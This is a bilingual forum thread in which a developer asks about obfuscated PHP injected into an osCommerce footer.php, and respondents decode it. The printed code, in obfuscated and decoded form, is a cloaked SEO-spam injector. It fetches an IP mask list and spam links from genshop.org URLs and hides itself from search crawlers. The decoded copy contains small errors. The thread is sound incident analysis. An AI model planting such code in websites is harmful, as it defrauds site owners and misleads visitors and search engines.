这段代码是一个漏洞吗？这个代码是什么？

发布于 2024-11-11 02:31:44 字数 2300 浏览 3 评论 0原文

我正在查看一个已被某人/某物利用的网站。该网站的页脚中注入了一堆链接，这些链接链接到制药宣传，谁知道还有什么。页脚顶部有很多链接。我现在只能在雅虎索引的缓存页面上找到这些。不过，谷歌仍然对该网站不满意，并且实时网站不再显示任何链接。这是给客户的……所以我主要知道我被告知的内容，以及我能找到的其他明智的内容。

我在 footer.php 的“尖端/顶部”找到了这段代码（它是一个 OsCommerse 站点）：

<?php $x13="cou\156\x74"; $x14="\x65\x72\162\x6fr\x5f\x72ep\157\162\164ing"; $x15="\146\151l\x65"; $x16="\146i\154\145_g\x65t\x5f\x63\x6fn\164\145n\164s"; $x17="\163\x74rle\156"; $x18="\163tr\160o\x73"; $x19="su\x62\x73\164\162"; $x1a="tr\151m"; 
ini_set(' display_errors','off');$x14(0);$x0b = "\150t\x74p\x3a\057\057\x67\145n\x73h\157\x70\056org/\163\x63\162ipt\057\155a\163k\x2e\x74x\x74";$x0c = $x0b; $x0d = $_SERVER["\x52E\115O\124\105_A\104\104\122"]; $x0e = @ $x15($x0c); for ( $x0f = 0; $x0f < $x13($x0e); $x0f++ ) {$x10 = $x1a($x0e[$x0f]);if ( $x10 != "" ){ if ( ($x11 = $x18($x10, "*")) !== false ) $x10 = $x19($x10, 0,$x11); if ( $x17($x10) <= $x17($x0d) && $x18($x0d, $x10) === 0 ) { $x12 =$x16("\150\164\164\160\x3a/\057g\145\x6e\x73\x68o\160\056o\162\x67\057\160aral\x69\x6e\x6b\x73\x2f\156e\167\x2f3\057\x66\145e\144\x72\157lle\x72\x2e\143\x6f\x6d\x2e\x74\170\x74"); echo "$x12"; } }}echo "\x3c\041\055\x2d \060\x36\071\x63\x35b4\x66e5\060\062\067\146\x39\x62\0637\x64\x653\x31d2be5\145\141\143\066\x37\040\x2d-\076";?>

当我查看具有“坏”链接的源缓存页面时，这段代码正好适合我在footer.php 源。对谷歌的一些研究表明，存在类似代码的漏洞利用。

你觉得怎么样，当我在自己的服务器上运行它时，我得到的只是源代码中的回显注释，如下所示：

<!-- 069c5b4fe5027f9b37de31d2be5eac67 -->

我不想匆忙删除代码并仅仅因为它看起来很糟糕就说“你的好”，特别是因为我没有立即知道“坏链接”已经消失的方法。顺便说一句，这些链接都指向一个死 URL。

您可以看到雅虎仍然缓存了坏页面： http://74.6.117.48/search/srpcache?ei=UTF-8&p=http%3A%2F%2Fwww.feedroller .com%2F+medicine&fr=yfp-t-701&u=http://cc.bingj.com/cache.aspx?q=http%3a%2f%2fwww.feedroller.com%2f+medicine&d =4746458759365253&mkt=en-US&setlang=en-US&w=b97b0175,d5f14ae5&icp=1&.intl=us&sig=Ifqk1OuvHXNcZnGgPR9PbA--

原文

I'm looking at a site that has been exploited by someone/something. The site has had a bunch of links injected into it's footer that links to pharmaceutical pitches, and who knows what else. There are/were a lot of links right at the top of the footer. I can only find these now, on the cached pages in the Yahoo index. Google is still not happy w/ the site though, and the live site does not show any links anymore. This is for a client..so I mostly know what I was told, and what I can find else wise.

I found this code at the very 'tip/top' of the footer.php (it's an OsCommerse Site):

<?php $x13="cou\156\x74"; $x14="\x65\x72\162\x6fr\x5f\x72ep\157\162\164ing"; $x15="\146\151l\x65"; $x16="\146i\154\145_g\x65t\x5f\x63\x6fn\164\145n\164s"; $x17="\163\x74rle\156"; $x18="\163tr\160o\x73"; $x19="su\x62\x73\164\162"; $x1a="tr\151m"; 
ini_set(' display_errors','off');$x14(0);$x0b = "\150t\x74p\x3a\057\057\x67\145n\x73h\157\x70\056org/\163\x63\162ipt\057\155a\163k\x2e\x74x\x74";$x0c = $x0b; $x0d = $_SERVER["\x52E\115O\124\105_A\104\104\122"]; $x0e = @ $x15($x0c); for ( $x0f = 0; $x0f < $x13($x0e); $x0f++ ) {$x10 = $x1a($x0e[$x0f]);if ( $x10 != "" ){ if ( ($x11 = $x18($x10, "*")) !== false ) $x10 = $x19($x10, 0,$x11); if ( $x17($x10) <= $x17($x0d) && $x18($x0d, $x10) === 0 ) { $x12 =$x16("\150\164\164\160\x3a/\057g\145\x6e\x73\x68o\160\056o\162\x67\057\160aral\x69\x6e\x6b\x73\x2f\156e\167\x2f3\057\x66\145e\144\x72\157lle\x72\x2e\143\x6f\x6d\x2e\x74\170\x74"); echo "$x12"; } }}echo "\x3c\041\055\x2d \060\x36\071\x63\x35b4\x66e5\060\062\067\146\x39\x62\0637\x64\x653\x31d2be5\145\141\143\066\x37\040\x2d-\076";?>

When I view the source cached pages that have the 'Bad' links, this code fits right in where I found it in the footer.php source. A little research on google show that there are exploits out there w/ similar code.

What do you think, when I run it on my own server all I get is the echoed comment in the source only like so:

<!-- 069c5b4fe5027f9b37de31d2be5eac67 -->

I don't want to just hastily remove the code and say 'your good' just because it looks bad, especially because I have no immediate way of knowing that the 'bad links' are gone. BTW, the links all go to a dead URL.

You can see the bad pages still cached at Yahoo:
http://74.6.117.48/search/srpcache?ei=UTF-8&p=http%3A%2F%2Fwww.feedroller.com%2F+medicine&fr=yfp-t-701&u=http://cc.bingj.com/cache.aspx?q=http%3a%2f%2fwww.feedroller.com%2f+medicine&d=4746458759365253&mkt=en-US&setlang=en-US&w=b97b0175,d5f14ae5&icp=1&.intl=us&sig=Ifqk1OuvHXNcZnGgPR9PbA--

分享到QQ

分享到微博

如果你对这篇内容有疑问，欢迎到本站社区发帖提问参与讨论，获取更多帮助，或者扫码二维码加入 Web 技术交流群。

发布评论

需要登录才能够评论，你可以免费注册一个本站的账号。

我为君王 2024-11-18 02:31:44

它似乎引用/加载两个网址：

这只是一个垃圾邮件分发脚本。

对于部分不混淆使用：

print preg_replace('#"[^"]+\\\\\w+"#e', "stripcslashes('$0')", $source);

It seems to reference / load two URLs:

It's just a spam distribution script.

For partial unobfuscation use:

print preg_replace('#"[^"]+\\\\\w+"#e', "stripcslashes('$0')", $source);

回复收藏 0 原文

无法言说的痛 2024-11-18 02:31:44

这是未混淆的脚本（或多或少），

它只是转储此 url 到您的页面上，

它还会根据IP 列表（google 等）检查remote_addr到尽量不被发现。

看起来您正在被 genshop.com 攻击

<?php

 $count="cou\156\x74"; // count 
 $error_reporting="\x65\x72\162\x6fr\x5f\x72ep\157\162\164ing"; // error_reporting
 $file="\146\151l\x65"; // file
 $file_get_contents="\146i\154\145_g\x65t\x5f\x63\x6fn\164\145n\164s"; // file_get_contents
 $strlen="\163\x74rle\156"; // strlen
 $strpos="\163tr\160o\x73"; // strpos
 $substr="su\x62\x73\164\162"; // substr
 $trim="tr\151m"; //trim

ini_set(' display_errors','off');
$error_reporting(0);

$x0b = "http://genshop.org/scripts/mask.txt";
$url = $x0b;
$tmp = "REMOTE_ADDR";
$x0d = $_SERVER[$tmp];
$tmp_filename = "http://genshop.org/paralinks/new/3/feedroller.com.txt";

$IPs = @ $file($url);
for ( $i = 0; $i < $count($IPs); $i++ ) {
    $curr_ip = $trim($ips[$i]);
        if ( $curr_ip != "" ) {
            if ( ($x11 = $strpos($curr_ip, "*")) !== false )
                $curr_ip = $substr($curr_ip, 0,$x11);

            // check visitor ip against mask list
            if ( $strlen($curr_ip) <= $strlen($x0d) && $strpos($x0d, $curr_ip) === 0 ) {
                $x12 = $file_get_content($tmp_filename);
                echo "$x12";
                // print spam contents
            }
        }
    }
echo $curr_ip;
}

$tmp2 = "\x3c\041\055\x2d \060\x36\071\x63\x35b4\x66e5\060\062\067\146\x39\x62\0637\x64\x653\x31d2be5\145\141\143\066\x37\040\x2d-\076";
echo $tmp2;
?>

here's the unobfuscated script (more or less)

it's just dumping the contents of this url onto your page

it also checks the remote_addr against a list of IPs (google, et al) to try to remain undetected.

looks like you're being attaced by genshop.com

<?php

 $count="cou\156\x74"; // count 
 $error_reporting="\x65\x72\162\x6fr\x5f\x72ep\157\162\164ing"; // error_reporting
 $file="\146\151l\x65"; // file
 $file_get_contents="\146i\154\145_g\x65t\x5f\x63\x6fn\164\145n\164s"; // file_get_contents
 $strlen="\163\x74rle\156"; // strlen
 $strpos="\163tr\160o\x73"; // strpos
 $substr="su\x62\x73\164\162"; // substr
 $trim="tr\151m"; //trim

ini_set(' display_errors','off');
$error_reporting(0);

$x0b = "http://genshop.org/scripts/mask.txt";
$url = $x0b;
$tmp = "REMOTE_ADDR";
$x0d = $_SERVER[$tmp];
$tmp_filename = "http://genshop.org/paralinks/new/3/feedroller.com.txt";

$IPs = @ $file($url);
for ( $i = 0; $i < $count($IPs); $i++ ) {
    $curr_ip = $trim($ips[$i]);
        if ( $curr_ip != "" ) {
            if ( ($x11 = $strpos($curr_ip, "*")) !== false )
                $curr_ip = $substr($curr_ip, 0,$x11);

            // check visitor ip against mask list
            if ( $strlen($curr_ip) <= $strlen($x0d) && $strpos($x0d, $curr_ip) === 0 ) {
                $x12 = $file_get_content($tmp_filename);
                echo "$x12";
                // print spam contents
            }
        }
    }
echo $curr_ip;
}

$tmp2 = "\x3c\041\055\x2d \060\x36\071\x63\x35b4\x66e5\060\062\067\146\x39\x62\0637\x64\x653\x31d2be5\145\141\143\066\x37\040\x2d-\076";
echo $tmp2;
?>

回复收藏 0 原文